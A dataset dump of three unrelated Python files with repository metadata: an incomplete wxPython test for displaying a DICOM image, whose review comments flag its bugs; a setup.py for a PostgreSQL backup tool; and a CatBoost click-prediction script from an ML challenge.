4b74f65c26c7b559cf75340d7f17ac6af0f1a7dc | 36c76076b0be2c6e8e517ff745e0e5d50f2c4293 | /scripts/plotImageTest.py | 34d6b33c481a28f64dee12bb70335dff5c0cf41f | [] | no_license | helrick/DicomAnonymizer | b2148e36e7b3375a0fe53f99ab3d498d8f0d1153 | 9e633ff7690dd2c46a0da597bcbebcc153c8cb7b | refs/heads/master | 2023-01-18T17:27:20.615572 | 2020-12-04T12:48:11 | 2020-12-04T12:48:11 | 119,464,768 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,114 | py | '''
Testing the embedding of a dicom image inside a wxPython GUI window
'''
import dicom
import matplotlib
import wx
matplotlib.use('WXAgg')
from matplotlib.figure import Figure
from matplotlib.backends.backend_wxagg import FigureCanvasWxAgg as FigCanvas
#for displaying the image as part of a GUI window
def main():
    """Demo: embed a DICOM image figure inside a wxPython frame.

    NOTE(review): this appears to be incomplete scaffolding — ``Window`` is
    defined but never instantiated, so calling main() only reads the file
    and defines the class. TODO confirm intent.
    """
    ds = dicom.read_file('xr_tspine.dcm')
    class Window(wx.Frame):
        title = 'testing plot embedding'
        def __init__(self):
            wx.Frame.__init__(self, None, -1, self.title)
            self.create_main_panel()
            self.draw_figure()
        def create_main_panel(self):
            # Panel hosting a matplotlib canvas backed by the WXAgg backend.
            self.panel = wx.Panel(self)
            self.fig = Figure()
            self.canvas = FigCanvas(self.panel, -1, self.fig)
        def draw_figure(self):
            ds = dicom.read_file('xr_tspine.dcm')
            # NOTE(review): map() requires a function as its first argument;
            # map(ds.pixel_array) raises TypeError when invoked — presumably
            # this meant ``self.data = ds.pixel_array``. TODO confirm.
            self.data = map(ds.pixel_array)
# NOTE(review): main() is never called here, so no frame is created before
# entering the wx event loop — the app starts with nothing to show.
# TODO confirm intent. (wx.PySimpleApp is also a legacy API in modern wx.)
if __name__ == '__main__':
    app = wx.PySimpleApp()
    app.MainLoop()
'''
#for simply displaying the image
import pylab
def main():
ds = dicom.read_file('xr_tspine.dcm')
pylab.imshow(ds.pixel_array, cmap=pylab.cm.bone)
pylab.axis('off')
pylab.show()
main()
'''
| [
"hillary.elrick@gmail.com"
] | hillary.elrick@gmail.com |
b2fc2a7a9e5cfd93c15fce3f77b061f55bfa1b3d | 8774de94e7a7e320cfe0ff3cd54370c63327ea08 | /setup.py | 24657a62294916121751e1afadee2dfc40147796 | [] | no_license | OMO-NOSA/pgbackup-tool | fa9ae3c2fbb6a4ecc1c0da05b37558c61d67addd | da05e658b58b41869a7eb402c4ea51cca02d2427 | refs/heads/master | 2021-06-24T23:41:09.729765 | 2019-12-01T11:17:47 | 2019-12-01T11:17:47 | 225,121,137 | 0 | 0 | null | 2021-04-30T21:55:50 | 2019-12-01T07:11:36 | Python | UTF-8 | Python | false | false | 679 | py | from setuptools import find_packages, setup
with open('README.md', 'r') as f:
long_description = f.read()
setup(
name='pgbackup',
version= '0.1.0',
author = 'Nosa Omorodion',
author_email='nosdgenius@gmail.com',
description='A utility for backing up PostgreSQL databases',
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/OMO-NOSA/pgbackup tool',
packages=find_packages('src'),
package_dir={'': 'src'},
install_requires=['boto3'],
python_requires ='>=3.6',
entry_points={
'console_scripts': [
'pgbackup=pgbackup.cli:main',
],
}
)
| [
"japhet.omorodion@gmail.com"
] | japhet.omorodion@gmail.com |
9ec87df973d15b7a680f9953251805be2e3cc00e | 5ee1288e54ebbd25c402d9dd6ce88b0fab6a631b | /rank2_munish/boost_final.py | d593b5b539765054ce1e5f39ac022b66784bdeb4 | [] | no_license | pyreqt/ML-Challenge-3 | 7853039774340dd060e1644f1c16509ad0c5301b | 518777cd1374f998e057092b7b50dc2e10007f57 | refs/heads/master | 2020-03-27T02:36:34.286174 | 2018-08-23T05:14:31 | 2018-08-23T05:14:31 | 145,803,465 | 0 | 0 | null | 2018-08-23T05:10:09 | 2018-08-23T05:10:09 | null | UTF-8 | Python | false | false | 7,402 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Jul 31 15:36:56 2017
@author: mbansa001c
"""
print ('loading libraries and data')
import pandas as pd
from catboost import CatBoostClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
import os
train = pd.read_csv("train.csv")
test = pd.read_csv("test.csv")
train['siteid'].fillna(-999, inplace=True)
test['siteid'].fillna(-999, inplace=True)
train['browserid'].fillna("None", inplace=True)
test['browserid'].fillna("None", inplace=True)
train['devid'].fillna("None", inplace=True)
test['devid'].fillna("None", inplace=True)
train['datetime'] = pd.to_datetime(train['datetime'])
test['datetime'] = pd.to_datetime(test['datetime'])
train['tweekday'] = train['datetime'].dt.weekday
train['thour'] = train['datetime'].dt.hour
train['tminute'] = train['datetime'].dt.minute
test['tweekday'] = test['datetime'].dt.weekday
test['thour'] = test['datetime'].dt.hour
test['tminute'] = test['datetime'].dt.minute
#### training only for the offers in test data #####
# Keep only training rows whose offerid also appears in test, then split
# both frames by country group: (a, b) here, (c..f) handled further below.
train_new=train[train['offerid'].isin(test['offerid'])]
train_a_b=train_new[train_new['countrycode'].isin(['a','b'])]
train_c_f=train_new[train_new['countrycode'].isin(['c','d','e','f'])]
test_a_b=test[test['countrycode'].isin(['a','b'])]
test_c_f=test[test['countrycode'].isin(['c','d','e','f'])]
# Hold the target aside so features can be built on train+test together.
trainY_df = train_a_b[['ID','click']]
train_a_b.drop(['click'], axis=1, inplace=True)
########join train and test########
df_all = pd.concat([train_a_b, test_a_b])
############ feature engineering, category count,offer count, offer access to users,week and hour level counts############
# Per-site uniques: distinct categories, distinct offers, and distinct
# impressions (ID) per (site, offer) pair.
catg_cnt=df_all.groupby(['siteid'])['category'].nunique().reset_index().rename(columns = {'category':'catg_cnt'})
offer_cnt=df_all.groupby(['siteid'])['offerid'].nunique().reset_index().rename(columns = {'offerid':'offer_cnt'})
offer_id_cnt=df_all.groupby(['siteid','offerid'])['ID'].nunique().reset_index().rename(columns = {'ID':'offer_id_cnt'})
df1=pd.merge(df_all, catg_cnt, how='left', on=['siteid'])
df2=pd.merge(df1, offer_cnt, how='left', on=['siteid'])
df3=pd.merge(df2, offer_id_cnt, how='left', on=['siteid','offerid'])
# Row counts at site / site+weekday / site+weekday+hour granularity,
# and the corresponding share ratios.
df3['site_user_cnt'] = df3.groupby(['siteid'])['ID'].transform('count')
df3['user_week_cnt'] = df3.groupby(['siteid','tweekday'])['ID'].transform('count')
df3['user_hr_cnt'] = df3.groupby(['siteid','tweekday','thour'])['ID'].transform('count')
df3['offer_user_share']=df3['offer_id_cnt']/df3['site_user_cnt']
df3['week_user_share']=df3['user_week_cnt']/df3['site_user_cnt']
df3['hr_user_share']=df3['user_hr_cnt']/df3['user_week_cnt']
##################
# Cast id-like columns to object so they are treated as categoricals.
cols = ['siteid','offerid','category','merchant']
for x in cols:
    df3[x] = df3[x].astype('object')
cols_to_use1=['siteid','user_hr_cnt','week_user_share','hr_user_share','merchant', 'catg_cnt', 'user_week_cnt', 'offer_cnt', 'site_user_cnt', 'browserid', 'tweekday', 'devid', 'offerid', 'thour', 'category','countrycode','offer_user_share','tminute']
###########splitting train test after feature creation###########
# Rows were concatenated train-first, so the first num_train rows are train.
num_train = len(train_a_b)
X_train = df3[:num_train]
X_test = df3[num_train:]
train_target=pd.merge(X_train,trainY_df,how='inner',on=['ID'])
# Train on a random 30% sample to keep fitting time manageable.
sampled=train_target.sample(frac=0.3)
trainX = sampled[cols_to_use1]
trainX.head()
trainY = sampled['click']
# catboost accepts categorical variables as indexes
# (positions within cols_to_use1: siteid, merchant, browserid, ... countrycode)
cat_cols = [0,4,9,10,11,12,13,14,15]
print ('train model........')
X_train1, X_test1, y_train1, y_test1 = train_test_split(trainX, trainY, test_size = 0.40)
model = CatBoostClassifier(depth=8, iterations=200, learning_rate=0.1, eval_metric='AUC', random_seed=1,calc_feature_importance=True)
model.fit(X_train1
    ,y_train1
    ,cat_features=cat_cols
    ,eval_set = (X_test1, y_test1)
    ,use_best_model = True
    )
preds_class = model.predict(X_test1)
print("accuracy = {}".format(accuracy_score(y_test1, preds_class)))
print(model.feature_importance_)
print ('making predictions.................')
#### predictions for test #########
# Probability of the positive (click) class for the a/b country group.
pred_a_b = model.predict_proba(X_test[cols_to_use1])[:,1]
sub_a_b=pd.DataFrame({'ID':test_a_b['ID'],'click':pred_a_b})
################################ Repeat from here for c,d,e,f countries again using train_c_f and test_c_f##############
# Same feature-engineering and modelling pipeline as above, applied to the
# c/d/e/f country group. NOTE(review): this is a verbatim copy of the a/b
# branch and rebinds the same intermediate names (df_all, df3, model, ...).
trainY_df = train_c_f[['ID','click']]
train_c_f.drop(['click'], axis=1, inplace=True)
########join train and test########
df_all = pd.concat([train_c_f, test_c_f])
############ feature engineering, category count,offer count, offer access to users,week and hour level counts############
catg_cnt=df_all.groupby(['siteid'])['category'].nunique().reset_index().rename(columns = {'category':'catg_cnt'})
offer_cnt=df_all.groupby(['siteid'])['offerid'].nunique().reset_index().rename(columns = {'offerid':'offer_cnt'})
offer_id_cnt=df_all.groupby(['siteid','offerid'])['ID'].nunique().reset_index().rename(columns = {'ID':'offer_id_cnt'})
df1=pd.merge(df_all, catg_cnt, how='left', on=['siteid'])
df2=pd.merge(df1, offer_cnt, how='left', on=['siteid'])
df3=pd.merge(df2, offer_id_cnt, how='left', on=['siteid','offerid'])
df3['site_user_cnt'] = df3.groupby(['siteid'])['ID'].transform('count')
df3['user_week_cnt'] = df3.groupby(['siteid','tweekday'])['ID'].transform('count')
df3['user_hr_cnt'] = df3.groupby(['siteid','tweekday','thour'])['ID'].transform('count')
df3['offer_user_share']=df3['offer_id_cnt']/df3['site_user_cnt']
df3['week_user_share']=df3['user_week_cnt']/df3['site_user_cnt']
df3['hr_user_share']=df3['user_hr_cnt']/df3['user_week_cnt']
##################
cols = ['siteid','offerid','category','merchant']
for x in cols:
    df3[x] = df3[x].astype('object')
cols_to_use1=['siteid','user_hr_cnt','week_user_share','hr_user_share','merchant', 'catg_cnt', 'user_week_cnt', 'offer_cnt', 'site_user_cnt', 'browserid', 'tweekday', 'devid', 'offerid', 'thour', 'category','countrycode','offer_user_share','tminute']
###########splitting train test after feature creation###########
num_train = len(train_c_f)
X_train = df3[:num_train]
X_test = df3[num_train:]
train_target=pd.merge(X_train,trainY_df,how='inner',on=['ID'])
sampled=train_target.sample(frac=0.3)
trainX = sampled[cols_to_use1]
trainX.head()
trainY = sampled['click']
# catboost accepts categorical variables as indexes
cat_cols = [0,4,9,10,11,12,13,14,15]
X_train1, X_test1, y_train1, y_test1 = train_test_split(trainX, trainY, test_size = 0.40)
model = CatBoostClassifier(depth=8, iterations=200, learning_rate=0.1, eval_metric='AUC', random_seed=1,calc_feature_importance=True)
model.fit(X_train1
    ,y_train1
    ,cat_features=cat_cols
    ,eval_set = (X_test1, y_test1)
    ,use_best_model = True
    )
preds_class = model.predict(X_test1)
print("accuracy = {}".format(accuracy_score(y_test1, preds_class)))
print(model.feature_importance_)
#### predictions for test #########
pred_c_f = model.predict_proba(X_test[cols_to_use1])[:,1]
sub_c_f=pd.DataFrame({'ID':test_c_f['ID'],'click':pred_c_f})
##join predictions after repeating for c to f countries###
# NOTE(review): DataFrame.append is deprecated/removed in modern pandas;
# pd.concat([sub_a_b, sub_c_f]) is the replacement — left unchanged here.
final=sub_a_b.append(sub_c_f)
#write output
final.to_csv("submission.csv",index=False)
| [
"manisara0000@gmail.com"
] | manisara0000@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.